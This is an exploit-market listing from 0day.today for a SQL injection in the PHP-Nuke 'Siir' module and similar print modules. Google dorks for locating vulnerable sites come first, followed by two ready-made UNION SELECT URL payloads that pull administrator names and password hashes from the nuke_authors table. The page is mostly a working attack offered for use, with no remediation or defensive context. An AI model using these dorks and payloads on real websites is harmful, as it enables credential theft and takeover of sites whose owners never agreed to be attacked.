[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP-Nuke Module Siir (id) Remote SQL Injection Vulnerability

Author
S@BUN
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2679
Category
web applications
Date add
21-02-2008
Platform
unsorted
============================================================
PHP-Nuke Module Siir (id) Remote SQL Injection Vulnerability
============================================================



###############################################################
#
# PHP-Nuke Siir SQL Injection(id)
#
################################################################
#
# DORK 1 : allinurl: modules-php-name-Siir
#
# all (modules.php?name=xx) subject have secret print and
#
# and cant see op=print but cann- use exploit
#
################################################################
EXPLOIT :

modules.php?name=Siir&op=print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202



==================NOTE===================


###############################################################
#
# PHP-Nuke genaral print SQL Injection(id)
#
#
################################################################
#
# DORK 1 : allinurl:"modules.php?name"print
#
# DORK 2 : allinurl:"modules.php?name=Hikaye"
#
# DORK : allinurl:"modules.php?name=Fikralar"
#
# DORK : allinurl:"modules.php?name=bilgi"
#
################################################################
example

http://xxxx/modules.php?name=(xxx subject)&(subject)=exploit

you cant see print id on google becouse all system have secret print and this exploit working simetimes but not always

EXPLOIT :

print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,0x3a,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202



#  0day.today [2024-07-08]  #